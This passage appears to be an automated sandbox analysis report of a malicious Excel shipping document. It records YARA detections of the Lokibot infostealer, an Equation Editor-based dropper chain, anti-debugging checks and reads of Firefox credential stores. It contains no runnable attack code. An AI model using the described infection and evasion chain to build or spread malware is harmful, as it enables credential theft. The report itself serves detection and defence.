              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 008AFF50 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xmtxpy.exe DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76E90000 page execute and read and write
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxVirustotal: Detection: 35%
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxReversingLabs: Detection: 32%
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$_2201S_BUSAN_HOCHIMINH_.xlsx
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD613.tmp
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@8/27@81/3
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: xmtxpy.exe, 00000005.00000003.463241268.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, xmtxpy.exe, 00000005.00000003.461526742.00000000023E0000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2556, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFF95 push ecx; ret
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00402AC0 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFF95 push ecx; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

              Boot Survival

              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AEFA9 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2364Thread sleep time: -300000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe TID: 2836Thread sleep time: -1020000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeThread delayed: delay time: 60000
              Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeAPI call chain: ExitProcess graph end node
              Source: vbc.exe, 00000004.00000002.465419977.0000000000894000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B0EEB _memset,IsDebuggerPresent,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B1B15 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AF18E GetProcessHeap,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AE750 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120402 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120616 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_001206C7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120706 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120744 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AE750 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFEB0 SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFEE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFEB0 SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFEE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory written: C:\Users\user\AppData\Local\Temp\xmtxpy.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B350C cpuid
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AF9DD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00406069 GetUserNameW,

              Stealing of Sensitive Information

              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
